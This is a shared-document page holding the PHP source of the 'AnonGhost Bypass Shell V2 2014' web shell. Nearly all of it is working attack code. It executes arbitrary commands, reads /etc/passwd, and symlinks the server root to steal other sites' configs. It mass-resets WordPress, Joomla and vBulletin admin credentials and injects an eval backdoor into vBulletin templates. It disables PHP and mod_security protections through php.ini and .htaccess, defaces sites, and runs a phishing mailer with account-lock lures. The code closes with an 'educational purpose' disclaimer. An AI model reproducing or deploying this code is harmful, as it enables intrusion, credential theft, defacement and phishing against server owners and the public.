Config Bash

Embed Size (px)

DESCRIPTION

config_bash

Citation preview

';if(isset($_POST['ms'])){error_reporting(0);$cmd="ls /var/named";$r=shell_exec($cmd);mkdir('conkill',0777);$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$f = fopen('conkill/.htaccess','w');$agshell = symlink("/","conkill/root");fwrite($f , $rr);echo '';echo $r;echo '



';}error_reporting(0);$webs=explode("\n",$_POST['web']);if(isset($_POST['w'])){$webs=explode("\n",$_POST['web']);echo "DomainsUsersSymlink ";foreach($webs as $f){$str=substr_replace($f,"",-4);$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));echo "".$str."".$user['name']."Symlink"; flush();}}echo '

';}if(isset($_GET['action']) && $_GET['action'] == 'file'){echo 'Symlink Info -Cms Scanner -Perl based symlink -Symlink Manual -Manually Retrieve Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass 2014 ';echo '
Symlink Manual
';echo'






';$pfile = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink){@mkdir('simfel',0777);$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";$f =@fopen ('simfel/.htaccess','w');@fwrite($f , $c);@symlink("$pfile","simfel/$symfile");echo '
Done.. !
Open this file -> '.$symfile.'';}}if(isset($_GET['action']) && $_GET['action'] == 'manu'){echo 'Symlink Info -Cms Scanner -Perl based symlink -Symlink Manual -Manually Retrieve Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass 2014 ';echo '
Manually Retrieve Config
';echo "

View fileView dir

";function red(){ $string = !empty($_POST['string']) ? $_POST['string'] : 0;$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;if ($string && $switch == "file") {$stream = imap_open($string, "", "");if ($stream == FALSE)die("Can't open imap stream");$str = imap_body($stream, 1);if (!empty($str))echo "".$str."";imap_close($stream);} elseif ($string && $switch == "dir") {$stream = imap_open("/etc/passwd", "", "");if ($stream == FALSE)die("Can't open imap stream");$string = explode("|",$string);if (count($string) > 1)$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));else$dir_list = imap_list($stream, trim($string[0]), "*");echo "";for ($i = 0; $i < count($dir_list); $i++)echo "$dir_list[$i]\n";echo "";imap_close($stream);}}if(strtolower(substr(PHP_OS, 0, 3)) == "win"){echo '
Sorry, This function does not work on Windows platforms.
';}else{$slash="/";$basep=str_replace("\\","/",$basep);}$s=$_SERVER['PHP_SELF'];echo '

SymLink With PHP





SymLink With OS :





';if ($_POST['mrc1'] && $_POST['mrc2']){if (symlink($_POST['mrc1'],$_POST['mrc2'])){echo "alert('Symlink Worked')";}else{echo "alert('Symlink Not Worked')";}}if ($_POST['mrci1'] && $_POST['mrci2']){if (system('ls -s '.$_POST['mrci1']." ".$_POST['mrci2'])){echo "alert('Symlink Worked')";}else{echo "alert('Symlink Didn't Work')";}}}if(isset($_GET['action']) && $_GET['action'] == 'ensim'){echo 'Symlink Info -Cms Scanner -Perl based symlink -Symlink Manual -Manually Retrieve Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass 2014 ';echo '
Enable Symlink If Disabled
';echo '


'; error_reporting(0); if(isset($_POST['ens'])){mkdir('ensim',0755);$rr ='Options AllOptions +FollowSymLinksOptions +SymLinksIfOwnerMatchOptions +ExecCGIAllowOverride AuthConfig FileInfo Indexes Limit Options=Includes,Includes,Indexes,MultiViews,SymLinksIfOwnerMatch';$g = fopen('ensim/.htaccess','w');fwrite($g,$rr);echo "

Symlink Function Enabled Successfully in apache pre main conf";} }if(isset($_GET['action']) && $_GET['action'] == 'maiilllerrr'){echo 'Mailer -Everything You Need -Paypal Checker -Email Extractor';echo '
Spam Mailer
';$testa = $_POST['veio'];if($testa != "") {$message = $_POST['html'];$subject = $_POST['assunto'].$_POST['assunto2'];$nome = $_POST['nome'];$de = $_POST['de'];$to = $_POST['emails'];$email = explode("\n", $to);$message = stripslashes($message);$i = 0;$count = 1;while($email[$i]) {$ok = "ok";$headers = "MIME-Version: 1.0\n";$headers .= "Content-Type: text/html; charset=UTF-8Content-Transfer-Encoding: 7bitX-Mailer: EDMAIL R6.00.02Content-Length: 41061\n";$headers .= "From: ".$email[$i]."\r\n";if(mail($email[$i], $subject, $message, $headers))echo "| Numero : [$count] ".$email[$i].": Sent . . . *o*
";elseecho "| Numero : [$count] ".$email[$i].": Error in Sending ? :(
";$i++;$count++;}$count--;if($ok == "ok")echo ""; }echo'|| Priv8 M@iler ||';echo'

| SUBJECT :

Select TitleTest TestApple Expiration de Votre Compte Ref : MNE0-13NBYou may to Update Your Account IDUpdate your account informationYour account has been limited until we hear from you OR

|LETTER :


| Reminder : Text HTML |

| MAILING LIST :


[email protected]| Mail List |



';}if(isset($_GET['action']) && $_GET['action'] == 'simby'){echo 'Symlink Info -Cms Scanner -Perl based symlink -Symlink Manual -Manually Retrieve Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP Protocol Symlink Bypass 2014 ';echo '
Symlink Bypass 2014 by Mauritania Attacker
';$fp = fopen("php.ini","w+");fwrite($fp,"safe_mode = OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes = NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE ");echo'





';echo 'PHP VERSION: ';echo phpversion();$fichier = $_POST['file'];$ghostfile = $_POST['ghostfile'];$symlink = $_POST['symlink'];if ($symlink){$dir = "mauritania";if(file_exists($dir)) {echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
\n";} else {@mkdir($dir); {echo "
\!/ mauritania Folder Created ^_^ \!/
\n";echo "
\!/ $ghostfile Retrieved Successfully ^_^ \!/
\n";} }// Extract Priv8 htaccess File //$priv9 = "#Priv9 htaccess By Mauritania AttackerOPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGIDirectoryIndex $ghostfileForceType text/plainAddType text/plain .php AddType text/plain .htmlAddType text/html .shtmlAddType txt .phpAddHandler server-parsed .phpAddHandler txt .phpAddHandler txt .htmlAddHandler txt .shtmlOptions AllOptions All";$f =@fopen ('mauritania/.htaccess','w');@fwrite($f , $priv9);@symlink("$fichier","mauritania/$ghostfile");echo '
'.$ghostfile.'';}}if(isset($_GET['action']) && $_GET['action'] == 'cmd'){echo 'MySQL & PostgreSql Connect -Command Execution -Base64 Command -Config Grabber -Subdomain Checker -Joomla Reverse Server - Wordpress Reverse Server -Find Directory Writable/Readable -Zone-h Notifier -Shtml Command Shell -Back connect Simple -Ruby BackConnect -Perl BackConnect -Python BackConnect -Exploit -Whcms Killer -Webmail Password Changer -Wordpress Csrf Exploit';echo '
Command Execution
';echo '

';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){echo $_GET['execmethod']($_GET['command']);}if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){echo $_POST['execmethod']($_POST['command']);}if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){popen($_GET['command'],"r");}echo'
System Exec Passthrupopen ';}if(isset($_GET['action']) && $_GET['action'] == 'com64'){echo 'MySQL & PostgreSql Connect -Command Execution -Base64 Command -Config Grabber -Subdomain Checker -Joomla Reverse Server - Wordpress Reverse Server -Find Directory Writable/Readable -Zone-h Notifier -Shtml Command Shell -Back connect Simple -Ruby BackConnect -Perl BackConnect -Python BackConnect -Exploit -Whcms Killer -Webmail Password Changer -Wordpress Csrf Exploit';echo '
Base64 Command
';echo ' ';if (empty($_POST['fak'])){echo '
';}else{$b4se64 =$_POST['fak'];$heno =base64_encode($b4se64);echo '';echo '';print $heno;echo '';}echo ' ReadCommand';if( !empty($_POST['coz']) )if ($dec=='decode'){echo '';}echo "";$ss=$_POST['coz'];$file = base64_decode($ss);if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file))) and empty($file))if ($_POST['dec']=='decode'){echo base64_encode($_POST['codene']);}echo '';echo '';}if(isset($_GET['action']) && $_GET['action'] == 'vgrab'){echo 'MySQL & PostgreSql Connect -Command Execution -Base64 Command -Config Grabber -Subdomain Checker -Joomla Reverse Server - Wordpress Reverse Server -Find Directory Writable/Readable -Zone-h Notifier -Shtml Command Shell -Back connect Simple -Ruby BackConnect -Perl BackConnect -Python BackConnect -Exploit -Whcms Killer -Webmail Password Changer -Wordpress Csrf Exploit';echo "
Config Grabber";?>
/etc/passwd content




config".$r."";flush();}else{echo "$dominconfigfailed";flush();}}die();}if(!is_file('named.txt')){$d00m = @file("/etc/named.conf");flush();}else{$d00m = file("named.txt");}if(!$d00m){die ("");}else{echo "

Domains Config Result ";$f = fopen('joomla.txt','w');foreach($d00m as $dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom, $domvw);if(strlen(trim($domvw[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));$wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/configuration.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php";$wpp3=get_headers($wp3);$wp13=$wpp3[0];$pos = strpos($wp, "200");$config="";if (strpos($wp, "200") == true ){ $config= $wpl;}elseif (strpos($wp12, "200") == true){ $config= $wp2;}elseif (strpos($wp13, "200") == true){ $config= $wp3;}else{continue;}flush();$dom = $domvw[1][0];$w = fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r = 'failed';}echo "".$domvw[1][0]."config".$r."";flush();}}}}echo "

";}if(isset($_GET['action']) && $_GET['action'] == 'wp'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass Change Admin vBulletin -Mass Change Admin WordPress -Wordpress & Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto Defacer ';echo '
Mass Change Admin Mass WordPress
';if(isset($_POST['s'])){$file = @file_get_contents('wp.txt');$ex = explode("\n",$file);echo " Domains Configs Result ";flush();flush();foreach ($ex as $exp){$es = explode("||",$exp);$config = $es[0];$domin = $es[1];$domins = trim($domin).'';$readconfig = @file_get_contents(trim($config));if(ereg('wp-settings.php',$readconfig)){$pass = ex($readconfig,"define('DB_PASSWORD', '","');");$userdb = ex($readconfig,"define('DB_USER', '","');");$db = ex($readconfig,"define('DB_NAME', '","');");$fix = ex($readconfig,'$table_prefix = \'',"';");$tab = $fix.'users';$con = @mysql_connect('localhost',$userdb,$pass);$db = @mysql_select_db($db,$con);$query = @mysql_query("UPDATE `$tab` SET `user_login` ='virusa'") or die;$query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;if ($query){$r = 'Succeed user [virusa] pass [1]';}else{$r = 'failed';}$domins = trim($domin).'';echo "$dominconfig".$r."";flush();flush();}else{echo "$dominconfigfailed2";flush();flush();}}die();}if(!is_file('named.txt')){$d00m = @file("/etc/named.conf");}else{$d00m = @file("named.txt");}if(!$d00m){die ("");}else{echo "

Domains Config Result ";flush();flush();$f = fopen('wp.txt','w');foreach($d00m as $dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom, $domvw);if(strlen(trim($domvw[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));$wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp/wp-config";$wpp3=get_headers($wp3);$wp13=$wpp3[0];$pos = strpos($wp, "200");$config="";if (strpos($wp, "200") == true ){ $config= $wpl;}elseif (strpos($wp12, "200") == true){ $config= $wp2;}elseif (strpos($wp13, "200") == true){ $config= $wp3;}else{continue;}flush();$dom = $domvw[1][0];$w = fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r = 'failed';}echo "".$domvw[1][0]."Config".$r."";flush();flush();flush();}}}}echo "

";}if(isset($_GET['action']) && $_GET['action'] == 'vb'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass Change Admin vBulletin -Mass Change Admin WordPress -Wordpress & Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto Defacer ';echo '
Mass Change Admin vBulletin
';if(isset($_POST['s'])){$file = @file_get_contents('vb.txt');$ex = explode("\n",$file);echo " Domains Configs Result ";foreach ($ex as $exp){$es = explode("||",$exp);$config = $es[0];$domin = $es[1];$domins = trim($domin).'';$readconfig = @file_get_contents(trim($config));if(ereg('vBulletin',$readconfig)){$db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");$userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");$pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");$con = @mysql_connect('localhost',$userdb,$pass);$db = @mysql_select_db($db,$con);$shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;$crypt = "{\${eval(gzinflate(base64_decode(\'";$crypt .= "$shell";$crypt .= "\')))}}{\${exit()}}";$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;$query = @mysql_query($sqlfaq,$con);if ($query){$r = 'Succeed shell in search.php';}else{$r = 'failed';}$domins = trim($domin).'';echo "$dominConfig".$r."";}else{echo "$dominConfigfailed2";}}die();}if(!is_file('named.txt')){$d00m = file("/etc/named.conf");}else{$d00m = file("named.txt");}if(!$d00m){die ("");}else{echo "

Domains Config Result ";$f = fopen('vb.txt','w');foreach($d00m as $dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom, $domvw);if(strlen(trim($domvw[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));///////////////////////////////////////////////////////////////////////////////////$wpl=$pageURL."/sim/rut/home/".$user['name']."/includes/config.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/vb/includes/config.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/forum/includes/config.php";$wpp3=get_headers($wp3);$wp13=$wpp3[0]; ////////// vb ////////////$pos = strpos($wp, "200");$config="";if (strpos($wp, "200") == true ){ $config= $wpl;}elseif (strpos($wp12, "200") == true){ $config= $wp2;}elseif (strpos($wp13, "200") == true){ $config= $wp3;}else{continue;}flush();$dom = $domvw[1][0];$w = fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r = 'failed';}echo "".$domvw[1][0]."Config".$r."";flush();}}}}echo "

";}if(isset($_GET['action']) && $_GET['action'] == 'abot'){echo '
AnonGhost Bypass Shell V2 2014
Coded by Virusa Worm - Mauritania Attacker - GrenCoder


AnonGhost Bypass Shell V2 2014 is created for Educational Purpose and testing on your own server, and not responsible for any misuse of it.

At first a Web Hacker was someone who would spend long hours trying to find bugs and exploit manually.
The term has now changed known as a Defacer nowadays.
Tools does not Made Hackers , Hackers make Tools.
Do not Learn To Hack , Hack to Learn.wkkwk..

"Keep Calm and enjoy Hacking \!/"


Special thankz to : AnonGhost Team


Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - TeaMp0isoN - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa Bicara - Maniak k4Sur [pasangan galo.. lol..]]
';}if(isset($_GET['action']) && $_GET['action'] == 'read'){echo 'Symlink Info -Cms Scanner -Perl based symlink -Symlink Manual -Manually Retrieve Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass 2014 ';echo '
Read /etc/passwd
';echo "
";flush();flush();$file = '/etc/named.conf';$w0co = @fopen($file, 'r');if ($w0co){$content = @fread($w0co, @filesize($file));echo "".htmlentities($content)."";}else if (!$w0co){$w0co = @show_source($file) ;}else if (!$w0co){$w0co = @highlight_file($file);}else if (!$w0co){$sm = @symlink($file,'sym.txt');if ($sm){$w0co = @fopen('sim/sym.txt', 'r');$content = @fread($w0co, @filesize($file));echo "".htmlentities($content)."";}}echo "

";if(isset($_GET['save'])){$cont = stripcslashes($_POST['file']);$f = fopen('named.txt','w');$w = fwrite($f,$cont);if($w){echo '
save has been successfully';}fclose($f);}}if(isset($_GET['action']) && $_GET['action'] == 'bforb'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass Root Path with system function
';mkdir('bforb', 0755);chdir('bforb');$bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBCeXBhc3MgUm9vdCBQYXRoIGJ5IFZpcnVzYSBXb3JtPC90aXRsZT48L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj48IS0tIGJvZHkge2JhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OyBmb250LWZhbWlseTpDb3VyaWVyCW1hcmdpbi1sZWZ0OiAwcHg7IG1hcmdpbi10b3A6IDBweDsgdGV4dC1hbGlnbjogY2VudGVyOyBOZXc7Zm9udC1zaXplOjEycHg7Y29sb3I6IzAwOTkwMDtmb250LXdlaWdodDo0MDA7fSBhe3RleHQtZGVjb3JhdGlvbjpub25lO30gYTpsaW5rIHtjb2xvcjojMDA5OTAwO30gYTp2aXNpdGVkIHtjb2xvcjojMDA3NzAwO30gYTpob3Zlcntjb2xvcjojMDBmZjAwO30gYTphY3RpdmUge2NvbG9yOiMwMDk5MDA7fSAtLT48IS0tIE1hZGUgQnkgVmlydXNhIFdvcm0gLS0+PC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgZWNobyAiPGNlbnRlcj48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQnlwYXNzIGl0JyBuYW1lPSd2aXJ1c2EnPjwvY2VudGVyPiI7IGlmIChpc3NldCgkX1BPU1RbJ3ZpcnVzYSddKSl7IHN5c3RlbSgnbG4gLXMgLyB2aXJ1c2EudHh0Jyk7ICRmdmNrZW0gPSdUM0IwYVc5dWN5QkpibVJsZUdWeklFWnZiR3h2ZDFONWJVeHBibXR6RFFwRWFYSmxZM1J2Y25sSmJtUmxlQ0J6YzNOemMzTXVhSFJ0RFFwQlpHUlVlWEJsSUhSNGRDQXVjR2h3RFFwQlpHUklZVzVrYkdWeUlIUjRkQ0F1Y0dodyc7ICRmaWxlID0gZm9wZW4oIi5odGFjY2VzcyIsIncrIik7ICR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGZ2Y2tlbSkpOyAkdmlydXNhID0gc3ltbGluaygiLyIsInZpcnVzYS50eHQiKTsgJHJ0PSI8YnI+PGEgaHJlZj12aXJ1c2EudHh0IFRBUkdFVD0nX2JsYW5rJz48Zm9udCBjb2xvcj0jMDBiYjAwIHNpemU9MiBmYWNlPSdDb3VyaWVyIE5ldyc+PGI+QnlwYXNzZWQgU3VjY2Vzc2Z1bGx5PC9iPjwvZm9udD48L2E+IjsgZWNobyAiPGJyPjxicj48Yj5Eb25lLi4gITwvYj48YnI+PGJyPkNoZWNrIGxpbmsgZ2l2ZW4gYmVsb3cgZm9yIC8gZm9sZGVyIHN5bWxpbmsgPGJyPiRydDwvY2VudGVyPiI7fSBlY2hvICI8L2Zvcm0+IjsgID8+PC90ZD48L3RyPjwvYm9keT48L2h0bWw+';$file = fopen("bforb.php" ,"w+");$write = fwrite ($file ,base64_decode($bforb));fclose($file);chmod("bforb.php",0755);echo "";}if(isset($_GET['action']) && $_GET['action'] == 'grasy'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass /etc/passwd Priv8
Coded By Mauritania Attacker

';echo 'Bypass with System Function
Bypass with Passthru Function
Bypass with exec Function
Bypass with shell_exec Function
Bypass with posix_getpwuid Function
'; //System Function //if($_POST['syst']){echo"";echo system("cat /etc/passwd");echo"
";echo"

";}echo ''; //Passthru Function //if($_POST['passth']){echo"";echo passthru("cat /etc/passwd");echo"
";echo"

"; }echo ''; //exec Function //if($_POST['ex']){echo"";echo exec("cat /etc/passwd");echo"
";echo"

";}echo '';//exec Function //if($_POST['shex']){echo"";echo shell_exec("cat /etc/passwd");echo"
";echo"

";}echo ''; //posix_getpwuid Function //if($_POST['mauritania']){echo"";for($uid=0;$uid $value) { print $value; } break;case 'fread': $fopen = @fopen($file,"r") or die("Unable to open file!"); $fread = @fread($fopen,90000); fclose($fopen); print_r($fread); break;case 'file_get_contents': $file_get_contents = @file_get_contents($file); print_r($file_get_contents); break;case 'fgets': $fgets = @fopen($file,"r") or die("Unable to open file!"); while(!feof($fgets)) { echo fgets($fgets); } fclose($fgets); break;default: echo "{$web} Not There"; } } echo "

";$file = trim($_POST['file']);if($_POST['start']){readfils($file); }echo "";}if(isset($_GET['action']) && $_GET['action'] == 'wrdprshtmlinj'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass Change Admin vBulletin -Mass Change Admin WordPress -Wordpress & Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto Defacer ';echo '
Wordpress Index Hijack Priv8

Coded By Mauritania Attacker




';$pghost = $_POST['pghost'];$dbnmn = $_POST['dbnmn'];$dbusrrrr = $_POST['dbusrrrr'];$pwddbbn = $_POST['pwddbbn'];$index = stripslashes($_POST['pown']);$prefix = $_POST['prefix'];//$prefix = "wp_";if ($_POST['up2']) {@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());@mysql_select_db($dbnmn) or die(mysql_error());$tableName = $prefix . "posts";$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");if (!$ghost1) {$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");} elseif (!$ghost2) {$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");}mysql_close();if ($ghost1 || $ghost2 || $ghost3) {echo "Index Website Have been Hijacked Successfully";} else {echo "Failed To Hijack the Website :(";}}}if(isset($_GET['action']) && $_GET['action'] == 'baidir'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass Chmod Directory Priv8
Coded By Mauritania Attacker

';echo '';if($_POST){$mauritania = $_POST['file'];$ch = @chmod($mauritania,'0311');if($ch){echo "[+] Directory =>{$mauritania} => [+] Permission Changed Successfully Bypassed ^_^ [+]";}else{echo "[-] Directory =>{$mauritania} => [-] Permission can't be changed , maybe chmod function is disabled :( [-]";}}}if(isset($_GET['action']) && $_GET['action'] == 'forb14'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass Forbidden 2014
Coded by Mauritania Attacker

';$fp = fopen("php.ini","w+");fwrite($fp,"safe_mode = OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes = NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE ");echo'





';echo 'PHP VERSION: ';echo phpversion();$fichier = $_POST['file'];$ghostfile = $_POST['ghostfile'];$symlink = $_POST['symlink'];if ($symlink){$dir = "mauritania";if(file_exists($dir)) {echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
";} else {@mkdir($dir); {echo '
\!/ mauritania Folder Created ^_^ \!/ ';echo '
File Retrieved Successfully';} }$priv9 = "#Priv9 htaccess By Mauritania AttackerOPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGIOptions Indexes FollowSymLinksDirectoryIndex $ghostfileForceType text/plainAddType text/plain .php AddType text/plain .htmlAddType text/html .shtmlAddType txt .phpAddHandler server-parsed .phpAddHandler txt .phpAddHandler txt .htmlAddHandler txt .shtmlOptions AllSetEnv PHPRC ".dirname(__FILE__)."/mauritania/php.inisuPHP_ConfigPath ".dirname(__FILE__)."/mauritania/php.ini";$f =@fopen ('mauritania/.htaccess','w');@fwrite($f , $priv9);@symlink("$fichier","mauritania/$ghostfile");echo '
'.$ghostfile.'';}}if(isset($_GET['action']) && $_GET['action'] == 'smod14'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass SafeMode 2014 Priv8
Coded by Mauritania Attacker

';echo "
Cwd Shell ini.php


";echo "Results Will Appear Here ^_^ ";if($_POST['start']) {$zero = $_POST['zero'];$file = $_POST['shell'];$mauritania = $_POST['rim'];$htaccess = "SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckCookieFormat OffSecFilterCheckUnicodeEncoding OffSecFilterNormalizeCookies Offorder deny,allowdeny from allallow from allorder deny,allowdeny from allSetEnv PHPRC $zero/ghost/php.ini";$phpini = "c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";$dir = "ghost"; if(file_exists($dir)) {echo "[+] ghost Folder Already Exist are you drunk :o xD !";} else {@mkdir($dir); {echo "[+] ghost Folder Has Been Created Nygga :3 !";} }#Generate Sh3LL$fopen = fopen("ghost/priv8.php5",'w');$shell = @file_get_contents($file);$swrite = fwrite($fopen ,$shell);if($swrite){echo "Shell Has Been Downloaded : $zero/ghost/priv8.php5 ";} else {echo "Can't Download Shell :( do it manually :D ";}fclose($fopen);#Generate Htaccess$kolsv = fopen("ghost/.htaccess", "w");$hwrite = fwrite($kolsv, $htaccess);if($hwrite){echo ".htaccess Generated Successfully \!/";} else {echo "Can't Generate Htaccess";}fclose($kolsv);#Generate ini.php$xopen = fopen("ghost/ini.php",'w');$rim = @file_get_contents($mauritania);$zzz = fwrite($xopen ,$rim);if($zzz){echo "ini.php Has Been Downloaded \!/";} else {echo "Can't Download ini.php :( do it manually :D ";}fclose($xopen);$ini = fopen("ghost/php.ini" ,"w");$php = fwrite($ini, base64_decode($phpini));if($php){echo "PHP.INI Generated Successfully \!/";} else {echo "[-] Can't Generate PHP.INI";}}echo "";}if(isset($_GET['action']) && $_GET['action'] == 'setphr'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass Perl Security -Bypass With Zip File -Bypass system function -Bypass With exec Function -Bypass With shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist -Bypass Functions suPHP_ConfigPath -Bypass 